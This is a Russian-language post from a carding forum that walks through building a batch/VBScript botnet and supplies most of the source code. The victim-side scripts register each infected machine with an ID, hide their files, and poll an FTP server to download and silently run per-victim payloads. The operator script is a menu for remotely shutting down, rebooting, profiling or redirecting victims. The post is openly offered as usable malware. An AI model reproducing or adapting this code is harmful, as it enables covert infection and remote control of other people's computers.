1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Botnet на bat,vbs

Тема в разделе "Чужие", создана пользователем vasenka444, 20 апр 2014.

  1. TopicStarter Overlay
    vasenka444

    vasenka444

    Регистрация:
    19 апр 2014
    Сообщения:
    299
    Симпатии:
    202
    Ботнет — является программой, скрытно устанавливаемой на устройство жертвы и позволяющей злоумышленнику выполнять некие действия с
    использованием ресурсов заражённого компьютера.

    [​IMG]

    Всего будет 9 файлов, 3 для жертвы и 6 для управления компьютерами(в конце я выложу архив со всеми исходниками)
    Сначала создадим файлы для жертвы:
    id.bat нужен для уникального номера для каждой жертвы:
    Задаём не отображение вводимых команд(не обязательно)
    @echo off

    Создаём файл SYS с настройками ftp где скачиваем файл id.txt где написан id последней жертвы
    echo> sys open хост
    echo>> sys логин
    echo>> sys пароль
    echo>> sys prompt
    echo>> sys mget id.txt
    echo>> sys bye
    ftp.exe -s:sys

    Создаём id.vbs для повышение на единицу переменной в текстовом файле
    echo>id.vbs Dim var
    echo>>id.vbs Set FSO=CreateObject("Scripting.FileSystemObject")
    Открываем файл id.txt для чтения
    echo>>id.vbs Set f=FSO.OpenTextFile("id.txt",1)
    Создаём файл id2.txt для записи
    echo>>id.vbs Set f2=FSO.OpenTextFile("id2.txt",2,True)

    Читаем первую строку из файла id2.txt в переменную var
    echo>>id.vbs var=f.ReadLine

    Повышаем значение var на 1
    echo>>id.vbs var=var+1

    Записываем переменную var в id2.txt
    echo>>id.vbs f2.WriteLine var

    Ждём на всякий случай
    ping -n 2 127.0.0.1 > nul

    И запускаем файл ранее созданный
    start id.vbs

    Ждём его выполнения
    ping -n 2 127.0.0.1 > nul

    Удаляем старый id.txt
    del /Q id.txt

    И заменяем его на id2.txt
    ren id2.txt id.txt

    Удаляем временный файл id.vbs
    del /Q id.vbs

    Создаём файл SYS с настройками ftp где удаляем старый id.txt и закачиваем новый
    echo> sys open хост
    echo>> sys логин
    echo>> sys пароль
    echo>> sys prompt
    echo>> sys mdel id.txt
    echo>> sys mput id.txt
    echo>> sys bye
    ftp.exe -s:sys
    del /Q sys

    Теперь объясняю source.txt (но вы попрежнему можете всё это пропустить и просто скачать архив со всеми исходниками):
    Здесь мы скрываем наши важные файлы:
    ATTRIB +H system.vbs
    ATTRIB +H system.bat
    ATTRIB +H sys.vbs
    ATTRIB +H sys

    Удаляем наши устаревшие файлы
    del /Q virus.bat
    del /Q sys
    del /Q status.vbs
    del /Q status.txt

    Здесь уже самое интересное, мы скачиваем и удаляем его из ftp(чтобы не
    скачивать его опять) bat который содержит вирус именно для нашего
    номера(id)

    echo> sys open хост
    echo>> sys логин
    echo>> sys пароль
    echo>> sys prompt
    echo>> sys mget %id%.bat
    echo>> sys mdel %id%.bat
    echo>> sys bye

    :1
    ftp.exe -s:sys

    Если существует bat перейти к отметке 2
    if exist %id%.bat goto 2

    Ждать 10 секунд чтобы не перегружать ваш сервер
    ping -n 10 127.0.0.1 > nul

    Т.к. не существует bat выполнять всё сначала

    goto 1

    :2

    Сделать невидимым наш скачаный по ftp вирус
    ATTRIB +H %id%.bat

    Создать sys.vbs для скрытного запуска нашего вируса
    echo Dim WshShell>sys.vbs
    echo Set WshShell = WScript.CreateObject("WScript.Shell")>>sys.vbs
    echo WshShell.Run "%id%.bat",0,true>>sys.vbs

    И запустить sys.vbs
    start sys.vbs

    loader.vbs нужен для переработки source.txt в system.bat так чтобы в его начале появилась переменная id
    Set FSO = CreateObject("Scripting.FileSystemObject")

    Если system.bat уже существует ничего не делаем
    If (FSO.FileExists("system.bat")) Then
    Else

    Открыть файлы: system.bat, source.txt и source.txt
    Set f = FSO.OpenTextFile("system.bat", 2, True)
    Set s = FSO.OpenTextFile("source.txt", 1)
    Set i = FSO.OpenTextFile("id.txt", 1)

    Прочитать id из id.txt
    id=i.ReadLine

    Вписать id=и тут id в файл system.bat
    f.WriteLine "Set id="+id
    И вписываем всё из source.txt в system.bat

    f.Write q
    End If

    И последний system.vbs для скрытного запуска нашего ботнета
    Dim WshShell
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "system.bat",0,false
    Так с файлами жертвы разобрались, в архиве будет описание как всё это упаковать,
    теперь делаем программу для нас, мы же хотим УПРАВЛЯТЬ, тогда вот первый файл
    управление компами.bat:
    Тут мы скачиваем id.txt в котором написано сколько же заражённых
    @echo off
    echo> sys open хост
    echo>> sys логин
    echo>> sys пароль
    echo>> sys prompt
    echo>> sys mget id.txt
    echo>> sys bye
    ftp.exe -s:sys
    По умолчанию мы управляем первой жертвой
    set id=1

    Метка понадобится потом
    :1
    del /Q %id%.bat
    Очищаем экран если были ошибки
    cls
    Это для дизайна
    echo ========================id:%id%
    Сколько заражено
    echo infected:
    type id.txt
    Каким мы компом управляем
    echo comp now:%id%
    echo ========================id:%id%
    Менюшка
    Выбрать id компьютера
    echo 0 to select
    Посмотреть информацию о его системе
    echo 1 to status
    Выключить его устройство
    echo 2 to off
    Перезагрузить
    echo 3 to reload
    Создать 9 неудаляемых папок на раб. столе
    echo 4 to not del papka in desktop
    Перейти на сайт
    echo 5 to go site

    echo 6 to passtome
    echo ========================id:%id%
    ] Помещаем введёное в переменную
    set /p x=
    А потом взависимости от введёного делаем что надо
    if "%x%" == "0" (
    cls
    echo ========================id:%id%
    echo enter id, id now:%id%
    echo ========================id:%id%
    set /p id=
    goto 1
    )
    if "%x%" == "1" (
    copy %~p0\Source\status.bat %~p0\%id%.bat
    )
    if "%x%" == "2" (
    copy %~p0\Source\off.bat %~p0\%id%.bat
    )
    if "%x%" == "3" (
    copy %~p0\Source\reload.bat %~p0\%id%.bat
    )
    if "%x%" == "4" (
    copy %~p0\Source\nodel.bat %~p0\%id%.bat
    )
    if "%x%" == "5" (
    cls
    echo ========================id:%id%
    echo enter site name, NO http://
    echo ========================id:%id%
    set /p site=
    echo>%id%.bat rundll32 url.dll,FileProtocolHandler Please login or register to view links
    echo>>%id%.bat start system.vbs
    )
    if "%x%" == "6" (md status)
    echo> sys open хост
    echo>> sys логин
    echo>> sys пароль
    echo>> sys prompt
    echo>> sys mput %id%.bat
    echo>> sys bye
    ftp.exe -s:sys
    goto 1
    Остальное объяснять не буду, т.к. уже много написал,
    буду обновлять архив, добавлять новые функции , исправлять баги,
    помогать если что и вы тоже мне помогите, ставте 5 звёзд(а то не буду
    обновлять архив)
    Для участия в конкурсе нужно готовый вирус залитый на мой сайт, упакованный программой SIM, объясняюсь почему не сделал:

    1.Никто не сможет его использовать, т.к. введены мои ftp данные
    2.Там введены мои ftp данные и все знают где лежат эти файлы
    3.Хороший вирус, из за нарушения одного правила не исключат же его

    Всё!


    Взято с batvirus.do.am
     
    • Like Like x 8
    Метки:

Поделиться этой страницей

Загрузка...